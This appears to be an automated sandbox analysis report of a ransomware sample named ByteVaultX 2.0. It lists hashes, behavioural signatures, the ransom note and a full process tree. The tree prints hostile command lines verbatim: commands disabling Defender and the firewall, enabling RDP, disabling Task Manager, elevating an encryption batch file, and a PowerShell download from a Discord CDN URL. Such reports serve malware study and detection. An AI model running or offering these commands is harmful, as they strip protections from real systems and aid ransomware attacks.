a37c17c44274545f31048dddb5a98c21c10c31deda6543330e4da26bf485fc7c

Resubmissions

25-05-2024 23:51

240525-3wjp3afg59 10

Analysis

max time kernel
146s
max time network
150s
platform
windows11-21h2_x64
resource
win11-20240426-en
resource tags

arch:x64arch:x86image:win11-20240426-enlocale:en-usos:windows11-21h2-x64system
submitted
25-05-2024 23:51

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ByteVaultX 2.0.exe
Size

9.9MB
MD5

26001ddd86377ac2ec3fcedb8d6f36b9
SHA1

cf4d832df5227ede476c0794cf871a4bcecb4d36
SHA256

a37c17c44274545f31048dddb5a98c21c10c31deda6543330e4da26bf485fc7c
SHA512

a09fe56683b4a42ce02b0e1e28557223bf0e925212e9f6541a805b914e08ab06843821d8e991fa0d3709e4e41b55db4c7b95496a29958665d10ab177b5a62277
SSDEEP

196608:9h5kRIk7AHkPkRJW9GNZA1HeT39Iig6eE9TFa0Z8DOjCdylNo1nz8QW7tx:aGFG8S1+TtIi+Y9Z8D8CclydoPx

Score

10^/10

evasion execution ransomware

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://cdn.discordapp.com/attachments/1181543227728330774/1244074466372489216/212723.jpg?ex=6653ca22&is=665278a2&hm=488e396c7831aaf740c20bf7536b9cc45421a2218ebf98197ebc307863606195&

Extracted

Path

C:\Encrypt\encrypt.html

Ransom Note

Your Files Have Been Encrypted Your Files Have Been Encrypted By The ByteVaultX Test-Ransomware The price for the Decryption is $0 in Bitcoin (BTC). Follow these steps to get your decryption: You Do It. But Remember this malware is Just For VMS This is a Test Ransomware Your Files Have Been Encrypted By The ByteVaultX Test-Ransomware Ask AI How to Use the Ransomware key with the decryption algorithm (in this case, the Fernet decryption algorithm) to decrypt each encrypted file. Save the decrypted data to new files or overwrite the original encrypted files if desired. You Will Also Have To install Python and cryptography Please note that the dercyption key is in the path C:\encrypt\Key.txt and please note you have infinite time For support, you can ask ai how to encrypt your data Trustet AI

Signatures

Renames multiple (145) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
ransomware
Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

14 2856 powershell.exe
Disables Task Manager via registry modification
evasion

flow	pid	process
14	2856	powershell.exe

Modifies Windows Firewall 2 TTPs 15 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

Processes:

netsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exe

pid	process
3000	netsh.exe
2308	netsh.exe
1340	netsh.exe
4968	netsh.exe
4260	netsh.exe
1112	netsh.exe
1360	netsh.exe
1576	netsh.exe
4836	netsh.exe
3580	netsh.exe
1804	netsh.exe
3432	netsh.exe
4764	netsh.exe
3448	netsh.exe
3232	netsh.exe

Loads dropped DLL 12 IoCs

Processes:

ByteVaultX 2.0.exe

pid	process
4860	ByteVaultX 2.0.exe
4860	ByteVaultX 2.0.exe
4860	ByteVaultX 2.0.exe
4860	ByteVaultX 2.0.exe
4860	ByteVaultX 2.0.exe
4860	ByteVaultX 2.0.exe
4860	ByteVaultX 2.0.exe
4860	ByteVaultX 2.0.exe
4860	ByteVaultX 2.0.exe
4860	ByteVaultX 2.0.exe
4860	ByteVaultX 2.0.exe
4860	ByteVaultX 2.0.exe

Drops desktop.ini file(s) 8 IoCs

Processes:

ByteVaultX 2.0.exe

description	ioc	process
File opened for modification	C:\Users\Admin\Music\desktop.ini	ByteVaultX 2.0.exe
File opened for modification	C:\Users\Admin\Videos\desktop.ini	ByteVaultX 2.0.exe
File opened for modification	C:\Users\Admin\Downloads\desktop.ini	ByteVaultX 2.0.exe
File opened for modification	C:\Users\Admin\Documents\desktop.ini	ByteVaultX 2.0.exe
File opened for modification	C:\Users\Admin\Pictures\desktop.ini	ByteVaultX 2.0.exe
File opened for modification	C:\Users\Admin\Pictures\Camera Roll\desktop.ini	ByteVaultX 2.0.exe
File opened for modification	C:\Users\Admin\Pictures\Saved Pictures\desktop.ini	ByteVaultX 2.0.exe
File opened for modification	C:\Users\Admin\Desktop\desktop.ini	ByteVaultX 2.0.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 22 IoCs

Start PowerShell.

execution

PowerShell

T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
2504	powershell.exe
2364	powershell.exe
2856	powershell.exe
1360	powershell.exe
2500	powershell.exe
2904	powershell.exe
4088	powershell.exe
2472	powershell.exe
1180	powershell.exe
4568	powershell.exe
4880	powershell.exe
932	powershell.exe
1460	powershell.exe
4768	powershell.exe
736	powershell.exe
3032	powershell.exe
4676	powershell.exe
2132	powershell.exe
3788	powershell.exe
4760	powershell.exe
4888	powershell.exe
1480	powershell.exe

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

Processes:

reg.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg"	reg.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

msedge.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe

Modifies registry class 1 IoCs

Processes:

powershell.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\Local Settings powershell.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000_Classes\Local Settings	powershell.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.exemsedge.exemsedge.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeidentity_helper.exepowershell.exepowershell.exemsedge.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
2904	powershell.exe
2904	powershell.exe
4676	powershell.exe
4676	powershell.exe
4948	msedge.exe
4948	msedge.exe
4868	msedge.exe
4868	msedge.exe
4868	msedge.exe
932	powershell.exe
932	powershell.exe
1460	powershell.exe
1460	powershell.exe
4088	powershell.exe
4088	powershell.exe
2364	powershell.exe
2364	powershell.exe
4768	powershell.exe
4768	powershell.exe
2600	identity_helper.exe
2600	identity_helper.exe
2132	powershell.exe
2132	powershell.exe
2132	powershell.exe
3788	powershell.exe
3788	powershell.exe
2276	msedge.exe
2276	msedge.exe
3788	powershell.exe
4760	powershell.exe
4760	powershell.exe
4760	powershell.exe
2472	powershell.exe
2472	powershell.exe
2472	powershell.exe
1180	powershell.exe
1180	powershell.exe
1180	powershell.exe
2856	powershell.exe
2856	powershell.exe
2856	powershell.exe
2504	powershell.exe
2504	powershell.exe
2504	powershell.exe
4888	powershell.exe
4888	powershell.exe
4888	powershell.exe
1360	powershell.exe
1360	powershell.exe
1360	powershell.exe
4568	powershell.exe
4568	powershell.exe
4568	powershell.exe
4880	powershell.exe
4880	powershell.exe
4880	powershell.exe
736	powershell.exe
736	powershell.exe
736	powershell.exe
1480	powershell.exe
1480	powershell.exe
1480	powershell.exe
2500	powershell.exe
2500	powershell.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs

Processes:

msedge.exe

pid process

4868 msedge.exe
4868 msedge.exe
4868 msedge.exe
4868 msedge.exe
4868 msedge.exe
4868 msedge.exe

Suspicious use of AdjustPrivilegeToken 22 IoCs

Processes:

description	pid	process
Token: SeDebugPrivilege	2904	powershell.exe
Token: SeDebugPrivilege	4676	powershell.exe
Token: SeDebugPrivilege	932	powershell.exe
Token: SeDebugPrivilege	1460	powershell.exe
Token: SeDebugPrivilege	4088	powershell.exe
Token: SeDebugPrivilege	2364	powershell.exe
Token: SeDebugPrivilege	4768	powershell.exe
Token: SeDebugPrivilege	2132	powershell.exe
Token: SeDebugPrivilege	3788	powershell.exe
Token: SeDebugPrivilege	4760	powershell.exe
Token: SeDebugPrivilege	2472	powershell.exe
Token: SeDebugPrivilege	1180	powershell.exe
Token: SeDebugPrivilege	2856	powershell.exe
Token: SeDebugPrivilege	2504	powershell.exe
Token: SeDebugPrivilege	4888	powershell.exe
Token: SeDebugPrivilege	1360	powershell.exe
Token: SeDebugPrivilege	4568	powershell.exe
Token: SeDebugPrivilege	4880	powershell.exe
Token: SeDebugPrivilege	736	powershell.exe
Token: SeDebugPrivilege	1480	powershell.exe
Token: SeDebugPrivilege	2500	powershell.exe
Token: SeDebugPrivilege	3032	powershell.exe

Suspicious use of FindShellTrayWindow 33 IoCs

Processes:

msedge.exe

pid	process
4868	msedge.exe
4868	msedge.exe
4868	msedge.exe
4868	msedge.exe
4868	msedge.exe
4868	msedge.exe
4868	msedge.exe
4868	msedge.exe
4868	msedge.exe
4868	msedge.exe
4868	msedge.exe
4868	msedge.exe
4868	msedge.exe
4868	msedge.exe
4868	msedge.exe
4868	msedge.exe
4868	msedge.exe
4868	msedge.exe
4868	msedge.exe
4868	msedge.exe
4868	msedge.exe
4868	msedge.exe
4868	msedge.exe
4868	msedge.exe
4868	msedge.exe
4868	msedge.exe
4868	msedge.exe
4868	msedge.exe
4868	msedge.exe
4868	msedge.exe
4868	msedge.exe
4868	msedge.exe
4868	msedge.exe

Suspicious use of SendNotifyMessage 16 IoCs

Processes:

msedge.exe

pid	process
4868	msedge.exe
4868	msedge.exe
4868	msedge.exe
4868	msedge.exe
4868	msedge.exe
4868	msedge.exe
4868	msedge.exe
4868	msedge.exe
4868	msedge.exe
4868	msedge.exe
4868	msedge.exe
4868	msedge.exe
4868	msedge.exe
4868	msedge.exe
4868	msedge.exe
4868	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

ByteVaultX 2.0.exeByteVaultX 2.0.exemsedge.execmd.exe

description	pid	process	target process
PID 1876 wrote to memory of 4860	1876	ByteVaultX 2.0.exe	ByteVaultX 2.0.exe
PID 1876 wrote to memory of 4860	1876	ByteVaultX 2.0.exe	ByteVaultX 2.0.exe
PID 4860 wrote to memory of 2904	4860	ByteVaultX 2.0.exe	powershell.exe
PID 4860 wrote to memory of 2904	4860	ByteVaultX 2.0.exe	powershell.exe
PID 4860 wrote to memory of 4836	4860	ByteVaultX 2.0.exe	netsh.exe
PID 4860 wrote to memory of 4836	4860	ByteVaultX 2.0.exe	netsh.exe
PID 4860 wrote to memory of 4112	4860	ByteVaultX 2.0.exe	runas.exe
PID 4860 wrote to memory of 4112	4860	ByteVaultX 2.0.exe	runas.exe
PID 4860 wrote to memory of 4868	4860	ByteVaultX 2.0.exe	msedge.exe
PID 4860 wrote to memory of 4868	4860	ByteVaultX 2.0.exe	msedge.exe
PID 4868 wrote to memory of 1372	4868	msedge.exe	msedge.exe
PID 4868 wrote to memory of 1372	4868	msedge.exe	msedge.exe
PID 4860 wrote to memory of 2064	4860	ByteVaultX 2.0.exe	cmd.exe
PID 4860 wrote to memory of 2064	4860	ByteVaultX 2.0.exe	cmd.exe
PID 2064 wrote to memory of 2884	2064	cmd.exe	reg.exe
PID 2064 wrote to memory of 2884	2064	cmd.exe	reg.exe
PID 2064 wrote to memory of 4752	2064	cmd.exe	reg.exe
PID 2064 wrote to memory of 4752	2064	cmd.exe	reg.exe
PID 2064 wrote to memory of 2652	2064	cmd.exe	reg.exe
PID 2064 wrote to memory of 2652	2064	cmd.exe	reg.exe
PID 2064 wrote to memory of 4632	2064	cmd.exe	reg.exe
PID 2064 wrote to memory of 4632	2064	cmd.exe	reg.exe
PID 2064 wrote to memory of 4676	2064	cmd.exe	powershell.exe
PID 2064 wrote to memory of 4676	2064	cmd.exe	powershell.exe
PID 4868 wrote to memory of 2684	4868	msedge.exe	msedge.exe
PID 4868 wrote to memory of 2684	4868	msedge.exe	msedge.exe
PID 4868 wrote to memory of 2684	4868	msedge.exe	msedge.exe
PID 4868 wrote to memory of 2684	4868	msedge.exe	msedge.exe
PID 4868 wrote to memory of 2684	4868	msedge.exe	msedge.exe
PID 4868 wrote to memory of 2684	4868	msedge.exe	msedge.exe
PID 4868 wrote to memory of 2684	4868	msedge.exe	msedge.exe
PID 4868 wrote to memory of 2684	4868	msedge.exe	msedge.exe
PID 4868 wrote to memory of 2684	4868	msedge.exe	msedge.exe
PID 4868 wrote to memory of 2684	4868	msedge.exe	msedge.exe
PID 4868 wrote to memory of 2684	4868	msedge.exe	msedge.exe
PID 4868 wrote to memory of 2684	4868	msedge.exe	msedge.exe
PID 4868 wrote to memory of 2684	4868	msedge.exe	msedge.exe
PID 4868 wrote to memory of 2684	4868	msedge.exe	msedge.exe
PID 4868 wrote to memory of 2684	4868	msedge.exe	msedge.exe
PID 4868 wrote to memory of 2684	4868	msedge.exe	msedge.exe
PID 4868 wrote to memory of 2684	4868	msedge.exe	msedge.exe
PID 4868 wrote to memory of 2684	4868	msedge.exe	msedge.exe
PID 4868 wrote to memory of 2684	4868	msedge.exe	msedge.exe
PID 4868 wrote to memory of 2684	4868	msedge.exe	msedge.exe
PID 4868 wrote to memory of 2684	4868	msedge.exe	msedge.exe
PID 4868 wrote to memory of 2684	4868	msedge.exe	msedge.exe
PID 4868 wrote to memory of 2684	4868	msedge.exe	msedge.exe
PID 4868 wrote to memory of 2684	4868	msedge.exe	msedge.exe
PID 4868 wrote to memory of 2684	4868	msedge.exe	msedge.exe
PID 4868 wrote to memory of 2684	4868	msedge.exe	msedge.exe
PID 4868 wrote to memory of 2684	4868	msedge.exe	msedge.exe
PID 4868 wrote to memory of 2684	4868	msedge.exe	msedge.exe
PID 4868 wrote to memory of 2684	4868	msedge.exe	msedge.exe
PID 4868 wrote to memory of 2684	4868	msedge.exe	msedge.exe
PID 4868 wrote to memory of 2684	4868	msedge.exe	msedge.exe
PID 4868 wrote to memory of 2684	4868	msedge.exe	msedge.exe
PID 4868 wrote to memory of 2684	4868	msedge.exe	msedge.exe
PID 4868 wrote to memory of 2684	4868	msedge.exe	msedge.exe
PID 4868 wrote to memory of 2684	4868	msedge.exe	msedge.exe
PID 4868 wrote to memory of 2684	4868	msedge.exe	msedge.exe
PID 4868 wrote to memory of 2684	4868	msedge.exe	msedge.exe
PID 4868 wrote to memory of 2684	4868	msedge.exe	msedge.exe
PID 4868 wrote to memory of 2684	4868	msedge.exe	msedge.exe
PID 4868 wrote to memory of 2684	4868	msedge.exe	msedge.exe

C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe
"C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1876

C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe
"C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe"
2⤵
- Loads dropped DLL
- Drops desktop.ini file(s)
- Suspicious use of WriteProcessMemory
PID:4860

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2904

C:\Windows\SYSTEM32\netsh.exe
netsh advfirewall set allprofiles state off
3⤵
- Modifies Windows Firewall
PID:4836

C:\Windows\SYSTEM32\runas.exe
runas /user:NT-AUTORITÄT\SYSTEM cmd.exe /c "C:\Encrypt\encrypt.bat"
3⤵
PID:4112

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Encrypt\encrypt.html
3⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4868

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x80,0x84,0xe4,0x7c,0x108,0x7ffd7d3a3cb8,0x7ffd7d3a3cc8,0x7ffd7d3a3cd8
4⤵
PID:1372

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1928,16507016480450448972,713057307233596285,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1940 /prefetch:2
4⤵
PID:2684

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1928,16507016480450448972,713057307233596285,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2168 /prefetch:3
4⤵
- Suspicious behavior: EnumeratesProcesses
PID:4948

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1928,16507016480450448972,713057307233596285,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2568 /prefetch:8
4⤵
PID:1196

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,16507016480450448972,713057307233596285,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3152 /prefetch:1
4⤵
PID:3404

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,16507016480450448972,713057307233596285,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3164 /prefetch:1
4⤵
PID:4364

C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1928,16507016480450448972,713057307233596285,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5372 /prefetch:8
4⤵
- Suspicious behavior: EnumeratesProcesses
PID:2600

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1928,16507016480450448972,713057307233596285,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5196 /prefetch:8
4⤵
- Suspicious behavior: EnumeratesProcesses
PID:2276

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,16507016480450448972,713057307233596285,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5212 /prefetch:1
4⤵
PID:2348

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,16507016480450448972,713057307233596285,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4584 /prefetch:1
4⤵
PID:1748

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,16507016480450448972,713057307233596285,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3176 /prefetch:1
4⤵
PID:3680

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,16507016480450448972,713057307233596285,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3252 /prefetch:1
4⤵
PID:5084

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1928,16507016480450448972,713057307233596285,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=5140 /prefetch:2
4⤵
PID:420

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Encrypt\encrypt.bat" "
3⤵
- Suspicious use of WriteProcessMemory
PID:2064

C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"
4⤵
PID:2884

C:\Windows\system32\reg.exe
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f
4⤵
PID:4752

C:\Windows\system32\reg.exe
reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"
4⤵
PID:2652

C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f
4⤵
PID:4632

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4676

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:932

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableScriptScanning $true"
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1460

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableEmailProtection $true"
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4088

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2364

C:\Windows\system32\netsh.exe
netsh firewall set opmode disable
4⤵
- Modifies Windows Firewall
PID:2308

C:\Windows\system32\netsh.exe
netsh firewall set opmode mode=DISABLE
4⤵
- Modifies Windows Firewall
PID:1340

C:\Windows\system32\netsh.exe
netsh advfirewall set currentprofile state off
4⤵
- Modifies Windows Firewall
PID:3580

C:\Windows\system32\netsh.exe
netsh advfirewall set domainprofile state off
4⤵
- Modifies Windows Firewall
PID:4968

C:\Windows\system32\netsh.exe
netsh advfirewall set privateprofile state off
4⤵
- Modifies Windows Firewall
PID:4260

C:\Windows\system32\netsh.exe
netsh advfirewall set publicprofile state off
4⤵
- Modifies Windows Firewall
PID:1804

C:\Windows\system32\netsh.exe
netsh advfirewall set allprofiles state off
4⤵
- Modifies Windows Firewall
PID:3432

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4768

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2132

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3788

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableScriptScanning $true"
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4760

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableEmailProtection $true"
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2472

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1180

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244074466372489216/212723.jpg?ex=6653ca22&is=665278a2&hm=488e396c7831aaf740c20bf7536b9cc45421a2218ebf98197ebc307863606195&', 'C:\Users\Admin\Desktop\kill.jpg')"
4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2856

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"
4⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2504

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"
5⤵
PID:1132

C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"
6⤵
PID:4032

C:\Windows\system32\reg.exe
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f
6⤵
PID:3004

C:\Windows\system32\reg.exe
reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"
6⤵
PID:4760

C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f
6⤵
PID:4260

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
